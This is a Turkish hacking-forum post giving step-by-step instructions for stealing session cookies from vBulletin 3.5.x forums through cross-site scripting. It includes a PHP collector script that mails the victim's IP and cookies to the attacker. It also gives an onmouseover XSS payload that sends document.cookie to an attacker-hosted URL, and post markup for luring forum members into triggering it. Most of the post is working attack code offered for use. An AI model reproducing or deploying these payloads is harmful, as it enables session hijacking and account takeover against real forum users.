vBulletin 3.5X xss açığı

Jurandyr

Katılımcı Üye
19 Ocak 2009
287
0
vBulletin 3.5.X Xss Acıgı Ile Cookıe Alma



vBulletin 3.5.X Xss Acıgı Ile Cookıe Alma [Yeni Acık]



Arkadaslar acık yenı bı acık ve maılınıze cookıelerı yolluyor yontem soyle;

(exploit.php) adında php dosya hazırlayıp ıcıne;


Code:
<?php
$ip_adresse = $_SERVER[\\'REMOTE_ADDR\\'];
if(!empty($ip_adresse))
{
echo \\'il tuo ip ?: \\',$ip_adresse;
}
else
{
echo \\'Impossible d\\\\\\'afficher l\\\\\\'IP\\';
}
?>

<a href=\\"log.php\\"></a><?
$xx1=$HTTP_SERVER_VARS[\\'SERVER_PORT\\'];
$day = date(\\"d\\",time()); $month = date(\\"m\\",time()); $year = date(\\"Y\\",time());
if ($REMOTE_HOST == \\"\\") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = \\'http://\\' . $HTTP_SERVER_VARS[\\'SERVER_NAME\\'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>

<?php
$cookie = $_GET[\\'c\\'];
?>

<?php
$myemail = \\"YOUR ADDRESS E-MAIL\\";
$today = date(\\"l, F j, Y, g:i a\\") ;
$subject = \\"Xss Vbulletin\\" ;
$message = \\"Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \\\\n
\\";
$from = \\"From: $myemail\\\\r\\\\n\\";
mail($myemail, $subject, $message, $from);
?>
Bunları koyup kaydedıyoruz ve hostumuza atıyoruz free de olur.
$myemail = \\"YOUR ADDRESS E-MAIL\\"; kodlarda bu kısma maıl adresımızı yazıyoruz..

Daha sonra bır notepad acıp ıcıne;


Code:
<pre a=\\'>\\' onmouseover=\\'********.********=\\"http://YOUR ADDRESS WEB.com/exploit.php?c=\\"+********.cookie\\' b=\\'</pre\\' >
bu kodları koyup gif olarak kaydedıyoruz edıtlenecek kısmı kendınıze gore edıtleyın..

Son olarak hedef foruma gıdıp uye olup konu acarken su mesaj kısmına sunu yazıyoruz


Code:
<a href=\\"http://YOUR ADDRESS WEB.com/IMAGE.GIF\\" target=\\"_blank\\">Tıklayınız</a> \\'
Gereklı yerlerı kendınıze gore edıtleyınız.
Umarım işinize yaramıştır.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.